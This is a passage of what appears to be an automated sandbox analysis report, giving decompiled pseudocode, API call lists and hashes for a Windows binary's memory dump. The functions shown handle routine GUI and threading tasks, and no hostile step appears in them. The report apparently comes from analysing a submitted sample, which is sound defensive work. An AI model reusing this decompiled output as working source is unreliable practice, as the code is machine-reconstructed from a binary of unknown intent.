                                  					_t17 = _v8;
                                  					if(_t17 != 0) {
                                  						_t17 = _t17 - 0xffffffec;
                                  					}
                                  					_push(_t17);
                                  					_push(1);
                                  					_push(E00438A30(_t28));
                                  					if( *0x44fb9c() != 0) {
                                  						_t34 =  *0x44dea0; // 0x41a280
                                  						E0040B12C(_t34, 1);
                                  						E0040384C();
                                  					}
                                  				}
                                  				_pop(_t37);
                                  				 *[fs:eax] = _t37;
                                  				_push(0x439be9);
                                  				return E004030D8(_v8);
                                  			}

                                  APIs
                                    • Part of subcall function 0040B8C0: 739414E0.VERSION(00000000,?,00000000,0040B996), ref: 0040B902
                                    • Part of subcall function 0040B8C0: 739414C0.VERSION(00000000,?,00000000,?,00000000,0040B979,?,00000000,?,00000000,0040B996), ref: 0040B937
                                    • Part of subcall function 0040B8C0: 73941500.VERSION(?,0040B9A8,?,?,00000000,?,00000000,?,00000000,0040B979,?,00000000,?,00000000,0040B996), ref: 0040B951
                                  • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00439B1C
                                  • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00439B2D
                                  • 73451DE0.COMCTL32(00000000,?,00000000,00439BE2), ref: 00439BAC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: 739414$7345173941500AddressHandleModuleProc
                                  • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                  • API String ID: 978676473-3125200627
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E00422010(intOrPtr _a4, intOrPtr* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x44f926 != 0) {
                                  					_t24 = 0;
                                  					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						 *((intOrPtr*)(_t29 + 4)) = 0;
                                  						 *((intOrPtr*)(_t29 + 8)) = 0;
                                  						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                  						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L00405F88();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					_t26 =  *0x44f910; // 0x422010
                                  					 *0x44f910 = E00421B38(6, _t23, _t26, _t27, _t29);
                                  					_t24 =  *0x44f910(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}















                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00422068
                                  • GetSystemMetrics.USER32 ref: 0042207D
                                  • GetSystemMetrics.USER32 ref: 00422088
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 004220B2
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoW
                                  • API String ID: 2545840971-2774842281
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E00421F3C(intOrPtr _a4, intOrPtr* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x44f925 != 0) {
                                  					_t24 = 0;
                                  					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						 *((intOrPtr*)(_t29 + 4)) = 0;
                                  						 *((intOrPtr*)(_t29 + 8)) = 0;
                                  						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                  						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L00405F88();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					_t26 =  *0x44f90c; // 0x421f3c
                                  					 *0x44f90c = E00421B38(5, _t23, _t26, _t27, _t29);
                                  					_t24 =  *0x44f90c(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}















                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00421F94
                                  • GetSystemMetrics.USER32 ref: 00421FA9
                                  • GetSystemMetrics.USER32 ref: 00421FB4
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 00421FDE
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoA
                                  • API String ID: 2545840971-1370492664
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E0041EA74(int __eax, void* __ecx, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				struct HDC__* _v16;
                                  				void* _v20;
                                  				struct tagRGBQUAD _v1044;
                                  				int _t16;
                                  				struct HDC__* _t18;
                                  				int _t31;
                                  				int _t34;
                                  				intOrPtr _t41;
                                  				void* _t43;
                                  				void* _t46;
                                  				void* _t48;
                                  				intOrPtr _t49;
                                  
                                  				_t16 = __eax;
                                  				_t46 = _t48;
                                  				_t49 = _t48 + 0xfffffbf0;
                                  				_v8 = __edx;
                                  				_t43 = __eax;
                                  				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                  					L5:
                                  					return _t16;
                                  				} else {
                                  					_t16 = E0041D8D8(_v8, 0xff,  &_v1044);
                                  					_t34 = _t16;
                                  					if(_t34 == 0) {
                                  						goto L5;
                                  					} else {
                                  						_push(0);
                                  						L004062C0();
                                  						_v12 = _t16;
                                  						_t18 = _v12;
                                  						_push(_t18);
                                  						L00405FC8();
                                  						_v16 = _t18;
                                  						_v20 = SelectObject(_v16, _t43);
                                  						_push(_t46);
                                  						_push(0x41eb23);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t49;
                                  						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
                                  						_pop(_t41);
                                  						 *[fs:eax] = _t41;
                                  						_push(0x41eb2a);
                                  						SelectObject(_v16, _v20);
                                  						DeleteDC(_v16);
                                  						_t31 = _v12;
                                  						_push(_t31);
                                  						_push(0);
                                  						L004064F8();
                                  						return _t31;
                                  					}
                                  				}
                                  			}


















                                  APIs
                                    • Part of subcall function 0041D8D8: GetObjectA.GDI32(?,00000004), ref: 0041D8EF
                                    • Part of subcall function 0041D8D8: 72E7AEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,0041EAAA), ref: 0041D912
                                  • 72E7AC50.USER32(00000000), ref: 0041EAB2
                                  • 72E7A590.GDI32(?,00000000), ref: 0041EABE
                                  • SelectObject.GDI32(?), ref: 0041EACB
                                  • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0041EB23,?,?,?,?,00000000), ref: 0041EAEF
                                  • SelectObject.GDI32(?,?), ref: 0041EB09
                                  • DeleteDC.GDI32(?), ref: 0041EB12
                                  • 72E7B380.USER32(00000000,?,?,?,?,0041EB2A,?,00000000,0041EB23,?,?,?,?,00000000), ref: 0041EB1D
                                  Similarity
                                  • API ID: Object$Select$A590B380ColorDeleteTable
                                  • String ID:
                                  • API String ID: 980243606-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E00449278(long __eax, void* __ecx, short __edx) {
                                  				struct tagPOINT _v24;
                                  				long _t7;
                                  				long _t12;
                                  				long _t19;
                                  				void* _t21;
                                  				struct HWND__* _t27;
                                  				short _t28;
                                  				void* _t30;
                                  				struct tagPOINT* _t31;
                                  
                                  				_t21 = __ecx;
                                  				_t7 = __eax;
                                  				_t31 = _t30 + 0xfffffff8;
                                  				_t28 = __edx;
                                  				_t19 = __eax;
                                  				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
                                  					L6:
                                  					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
                                  				} else {
                                  					 *((short*)(__eax + 0x44)) = __edx;
                                  					if(__edx != 0) {
                                  						L5:
                                  						_t7 = SetCursor(E00449250(_t19, _t28));
                                  						goto L6;
                                  					} else {
                                  						GetCursorPos(_t31);
                                  						_push(_v24.y);
                                  						_t27 = WindowFromPoint(_v24);
                                  						if(_t27 == 0) {
                                  							goto L5;
                                  						} else {
                                  							_t12 = GetWindowThreadProcessId(_t27, 0);
                                  							if(_t12 != GetCurrentThreadId()) {
                                  								goto L5;
                                  							} else {
                                  								_t7 = SendMessageA(_t27, 0x20, _t27, E00406630(SendMessageA(_t27, 0x84, 0, E004066A8(_t31, _t21)), 0x200));
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t7;
                                  			}













                                  APIs
                                  • GetCursorPos.USER32 ref: 00449293
                                  • WindowFromPoint.USER32(?,?), ref: 004492A0
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004492AE
                                  • GetCurrentThreadId.KERNEL32 ref: 004492B5
                                  • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 004492CE
                                  • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004492E5
                                  • SetCursor.USER32(00000000), ref: 004492F7
                                  Similarity
                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                  • String ID:
                                  • API String ID: 1770779139-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040AFA8(void* __edx, void* __edi, void* __fp0) {
                                  				void _v1024;
                                  				char _v1088;
                                  				long _v1092;
                                  				void* _t12;
                                  				char* _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr _t24;
                                  				long _t32;
                                  
                                  				E0040AE20(_t12,  &_v1024, __edx, __fp0, 0x400);
                                  				_t14 =  *0x44e014; // 0x44f048
                                  				if( *_t14 == 0) {
                                  					_t16 =  *0x44ddec; // 0x4069b0
                                  					_t9 = _t16 + 4; // 0xffe9
                                  					_t18 =  *0x44f664; // 0x400000
                                  					LoadStringA(E00404E7C(_t18),  *_t9,  &_v1088, 0x40);
                                  					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                  				}
                                  				_t24 =  *0x44de3c; // 0x44f218
                                  				E00402824(E00402980(_t24));
                                  				CharToOemA( &_v1024,  &_v1024);
                                  				_t32 = E00408128( &_v1024, __edi);
                                  				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                  				return WriteFile(GetStdHandle(0xfffffff4), 0x40b06c, 2,  &_v1092, 0);
                                  			}













                                  APIs
                                    • Part of subcall function 0040AE20: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AE3D
                                    • Part of subcall function 0040AE20: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AE61
                                    • Part of subcall function 0040AE20: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AE7C
                                    • Part of subcall function 0040AE20: LoadStringA.USER32 ref: 0040AF12
                                  • CharToOemA.USER32 ref: 0040AFDF
                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040AFFC
                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B002
                                  • GetStdHandle.KERNEL32(000000F4,0040B06C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B017
                                  • WriteFile.KERNEL32(00000000,000000F4,0040B06C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B01D
                                  • LoadStringA.USER32 ref: 0040B03F
                                  • MessageBoxA.USER32 ref: 0040B055
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                  • String ID:
                                  • API String ID: 185507032-0
                                  • Opcode ID: 2f4d012c33f209a91f8428be797ca667ec68b43c005e2170dbab65bcb9e84aff
                                  • Instruction ID: 4f6bfba07490a23bffdc6b2f7c58a44c245cf6171cc857a86fc7991de4ec66dc
                                  • Opcode Fuzzy Hash: 2f4d012c33f209a91f8428be797ca667ec68b43c005e2170dbab65bcb9e84aff
                                  • Instruction Fuzzy Hash: 231170B65042046ED200FBA5CC46F9B77ECAB45704F80453BB794F60E2DA78E9088B6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00444DCC(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr* _v12;
                                  				struct HDC__* _v16;
                                  				struct tagPAINTSTRUCT _v80;
                                  				struct tagRECT _v96;
                                  				struct tagRECT _v112;
                                  				signed int _v116;
                                  				long _v120;
                                  				void* __ebp;
                                  				void* _t68;
                                  				void* _t94;
                                  				struct HBRUSH__* _t97;
                                  				intOrPtr _t105;
                                  				void* _t118;
                                  				void* _t127;
                                  				intOrPtr _t140;
                                  				intOrPtr _t146;
                                  				void* _t147;
                                  				void* _t148;
                                  				void* _t150;
                                  				void* _t152;
                                  				intOrPtr _t153;
                                  
                                  				_t148 = __esi;
                                  				_t147 = __edi;
                                  				_t138 = __edx;
                                  				_t127 = __ebx;
                                  				_t150 = _t152;
                                  				_t153 = _t152 + 0xffffff8c;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t68 =  *_v12 - 0xf;
                                  				if(_t68 == 0) {
                                  					_v16 =  *(_v12 + 4);
                                  					if(_v16 == 0) {
                                  						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
                                  					}
                                  					_push(_t150);
                                  					_push(0x444f9a);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t153;
                                  					if(_v16 == 0) {
                                  						GetWindowRect( *(_v8 + 0x254),  &_v96);
                                  						E0042BA34(_v8,  &_v120,  &_v96);
                                  						_v96.left = _v120;
                                  						_v96.top = _v116;
                                  						E0042A82C( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
                                  					}
                                  					E00430258(_v8, _t127, _v12, _t147, _t148);
                                  					_pop(_t140);
                                  					 *[fs:eax] = _t140;
                                  					_push(0x444fa8);
                                  					if(_v16 == 0) {
                                  						return EndPaint( *(_v8 + 0x254),  &_v80);
                                  					}
                                  					return 0;
                                  				} else {
                                  					_t94 = _t68 - 5;
                                  					if(_t94 == 0) {
                                  						_t97 = E0041C700( *((intOrPtr*)(_v8 + 0x170)));
                                  						 *((intOrPtr*)( *_v8 + 0x44))();
                                  						FillRect( *(_v12 + 4),  &_v112, _t97);
                                  						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
                                  							GetClientRect( *(_v8 + 0x254),  &_v96);
                                  							FillRect( *(_v12 + 4),  &_v96, E0041C700( *((intOrPtr*)(_v8 + 0x170))));
                                  						}
                                  						_t105 = _v12;
                                  						 *((intOrPtr*)(_t105 + 0xc)) = 1;
                                  					} else {
                                  						_t118 = _t94 - 0x2b;
                                  						if(_t118 == 0) {
                                  							E00444D40(_t150);
                                  							_t105 = _v8;
                                  							if( *((char*)(_t105 + 0x22f)) == 2) {
                                  								if(E00445268(_v8) == 0 || E00444D8C(_t138, _t150) == 0) {
                                  									_t146 = 1;
                                  								} else {
                                  									_t146 = 0;
                                  								}
                                  								_t105 = E004420AC( *(_v8 + 0x254), _t146);
                                  							}
                                  						} else {
                                  							if(_t118 != 0x45) {
                                  								_t105 = E00444D40(_t150);
                                  							} else {
                                  								E00444D40(_t150);
                                  								_t105 = _v12;
                                  								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                                  									_t105 = _v12;
                                  									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					return _t105;
                                  				}
                                  			}


























                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                  • String ID:
                                  • API String ID: 901200654-0
                                  • Opcode ID: 7045648023c2386d6f2b84c9f25314f507e68e8564f2c2ff1b3a0fc32e253074
                                  • Instruction ID: 55874e7d0bff21dc4238f3ac22219e850c0d777c57e19ed545ceddbfa13ebdbb
                                  • Opcode Fuzzy Hash: 7045648023c2386d6f2b84c9f25314f507e68e8564f2c2ff1b3a0fc32e253074
                                  • Instruction Fuzzy Hash: 8251EB74904109EFDB10DBE9C989E9DB7F8AF88314F6581A6E404AB391D738AE45CB08
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00418D24(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				intOrPtr* _v12;
                                  				long _v16;
                                  				char _v20;
                                  				char _v24;
                                  				long _t22;
                                  				char _t29;
                                  				void* _t53;
                                  				intOrPtr _t61;
                                  				intOrPtr* _t62;
                                  				intOrPtr _t63;
                                  				intOrPtr _t66;
                                  				intOrPtr _t67;
                                  				void* _t72;
                                  				void* _t73;
                                  				intOrPtr _t74;
                                  
                                  				_t72 = _t73;
                                  				_t74 = _t73 + 0xffffffec;
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_t53 = __eax;
                                  				_t22 = GetCurrentThreadId();
                                  				_t62 =  *0x44e110; // 0x44f030
                                  				if(_t22 !=  *_t62) {
                                  					_v24 = GetCurrentThreadId();
                                  					_v20 = 0;
                                  					_t61 =  *0x44dfb4; // 0x4101d0
                                  					E0040B168(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
                                  					E0040384C();
                                  				}
                                  				if(_t53 <= 0) {
                                  					E00418CFC();
                                  				} else {
                                  					E00418D08(_t53);
                                  				}
                                  				_v16 = 0;
                                  				_push(0x44f868);
                                  				L00405DD0();
                                  				_push(_t72);
                                  				_push(0x418eb2);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t74;
                                  				_v16 = InterlockedExchange( &E0044D3E8, _v16);
                                  				_push(_t72);
                                  				_push(0x418e93);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t74;
                                  				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
                                  					_t29 = 0;
                                  				} else {
                                  					_t29 = 1;
                                  				}
                                  				_v5 = _t29;
                                  				if(_v5 == 0) {
                                  					L15:
                                  					_pop(_t63);
                                  					 *[fs:eax] = _t63;
                                  					_push(E00418E9A);
                                  					return E004030D8(_v16);
                                  				} else {
                                  					if( *((intOrPtr*)(_v16 + 8)) > 0) {
                                  						_v12 = E00413524(_v16, 0);
                                  						E00413414(_v16, 0);
                                  						L00405EF8();
                                  						 *[fs:eax] = _t74;
                                  						 *[fs:eax] = _t74;
                                  						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x418e5d, _t72, 0x44f868);
                                  						_pop(_t66);
                                  						 *[fs:eax] = _t66;
                                  						_t67 = 0x418e2e;
                                  						 *[fs:eax] = _t67;
                                  						_push(E00418E64);
                                  						_push(0x44f868);
                                  						L00405DD0();
                                  						return 0;
                                  					} else {
                                  						goto L15;
                                  					}
                                  				}
                                  			}




















                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00418D2F
                                  • GetCurrentThreadId.KERNEL32 ref: 00418D3E
                                    • Part of subcall function 00418CFC: ResetEvent.KERNEL32(00000184,00418D79,?,?,00000000), ref: 00418D02
                                  • RtlEnterCriticalSection.KERNEL32(0044F868,?,?,00000000), ref: 00418D83
                                  • InterlockedExchange.KERNEL32(0044D3E8,?), ref: 00418D9F
                                  • RtlLeaveCriticalSection.KERNEL32(0044F868,00000000,00418E93,?,00000000,00418EB2,?,0044F868,?,?,00000000), ref: 00418DF8
                                  • RtlEnterCriticalSection.KERNEL32(0044F868,00418E64,00418E93,?,00000000,00418EB2,?,0044F868,?,?,00000000), ref: 00418E57
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                  • String ID:
                                  • API String ID: 2189153385-0
                                  • Opcode ID: d4cd307b9d9a8597e97f57c9782096fd8b62303046f86261219f4dd5f51558f8
                                  • Instruction ID: 91d84d69db5769fe762a09fbff6e4525cf684ef7422af7b6cc090730de55e960
                                  • Opcode Fuzzy Hash: d4cd307b9d9a8597e97f57c9782096fd8b62303046f86261219f4dd5f51558f8
                                  • Instruction Fuzzy Hash: 4E31F530A04744AFE701DF69D852A9AB7F9EF49704F6188BFF400E6691DB3C5D80CA29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0041DB84(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				signed int _v32;
                                  				signed short _v44;
                                  				int _t36;
                                  				signed int _t37;
                                  				signed short _t38;
                                  				signed int _t39;
                                  				signed short _t43;
                                  				signed int* _t47;
                                  				signed int _t51;
                                  				intOrPtr _t61;
                                  				void* _t67;
                                  				void* _t68;
                                  				void* _t69;
                                  				intOrPtr _t70;
                                  
                                  				_t68 = _t69;
                                  				_t70 = _t69 + 0xffffff90;
                                  				_v16 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t47 = _a8;
                                  				_v24 = _v16 << 4;
                                  				_v20 = E004077D4(_v24, __eflags);
                                  				 *[fs:edx] = _t70;
                                  				_t51 = _v24;
                                  				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x41de7b, _t68, __edi, __esi, __ebx, _t67);
                                  				if(( *_t47 | _t47[1]) != 0) {
                                  					_t36 = _a4;
                                  					 *_t36 =  *_t47;
                                  					 *(_t36 + 4) = _t47[1];
                                  				} else {
                                  					 *_a4 = GetSystemMetrics(0xb);
                                  					_t36 = GetSystemMetrics(0xc);
                                  					 *(_a4 + 4) = _t36;
                                  				}
                                  				_push(0);
                                  				L004062C0();
                                  				_v44 = _t36;
                                  				if(_v44 == 0) {
                                  					E0041D048(_t51);
                                  				}
                                  				_push(_t68);
                                  				_push(0x41dc6d);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t70;
                                  				_push(0xe);
                                  				_t37 = _v44;
                                  				_push(_t37);
                                  				L00406058();
                                  				_push(0xc);
                                  				_t38 = _v44;
                                  				_push(_t38);
                                  				L00406058();
                                  				_t39 = _t37 * _t38;
                                  				if(_t39 <= 8) {
                                  					__eflags = 1;
                                  					_v32 = 1 << _t39;
                                  				} else {
                                  					_v32 = 0x7fffffff;
                                  				}
                                  				_pop(_t61);
                                  				 *[fs:eax] = _t61;
                                  				_push(E0041DC74);
                                  				_t43 = _v44;
                                  				_push(_t43);
                                  				_push(0);
                                  				L004064F8();
                                  				return _t43;
                                  			}























                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0041DBD2
                                  • GetSystemMetrics.USER32 ref: 0041DBDE
                                  • 72E7AC50.USER32(00000000), ref: 0041DBFA
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0041DC6D,?,00000000), ref: 0041DC21
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041DC6D,?,00000000), ref: 0041DC2E
                                  • 72E7B380.USER32(00000000,00000000,0041DC74,0000000E,00000000,0041DC6D,?,00000000), ref: 0041DC67
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$B380
                                  • String ID:
                                  • API String ID: 3145338429-0
                                  • Opcode ID: 8d7b9b434337f5fc7a35b25fc98d009ad79e50105f6989cdf122ad2c3a5fbb41
                                  • Instruction ID: 1d8e87c9eed3e92d580f4da9f4cabc8a744abd4682a04f08c2fc2fe2e1bb54a1
                                  • Opcode Fuzzy Hash: 8d7b9b434337f5fc7a35b25fc98d009ad79e50105f6989cdf122ad2c3a5fbb41
                                  • Instruction Fuzzy Hash: C43184B4E04204DFDB00DFA5C881ADEBBB5FB49310F11856AF815AB380D778AD41CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 45%
                                  			E0041DFDC(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                  				char _v5;
                                  				struct HDC__* _v12;
                                  				struct HDC__* _v16;
                                  				struct HDC__* _t29;
                                  				struct tagBITMAPINFO* _t32;
                                  				intOrPtr _t39;
                                  				struct HBITMAP__* _t43;
                                  				void* _t46;
                                  
                                  				_t32 = __ecx;
                                  				_t43 = __eax;
                                  				E0041DE8C(__eax, _a4, __ecx);
                                  				_v12 = 0;
                                  				_push(0);
                                  				L00405FC8();
                                  				_v16 = 0;
                                  				_push(_t46);
                                  				_push(0x41e079);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t46 + 0xfffffff4;
                                  				if(__edx != 0) {
                                  					_push(0);
                                  					_push(__edx);
                                  					_t29 = _v16;
                                  					_push(_t29);
                                  					L004060F0();
                                  					_v12 = _t29;
                                  					_push(_v16);
                                  					L004060C8();
                                  				}
                                  				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
                                  				_pop(_t39);
                                  				 *[fs:eax] = _t39;
                                  				_push(E0041E080);
                                  				if(_v12 != 0) {
                                  					_push(0);
                                  					_push(_v12);
                                  					_push(_v16);
                                  					L004060F0();
                                  				}
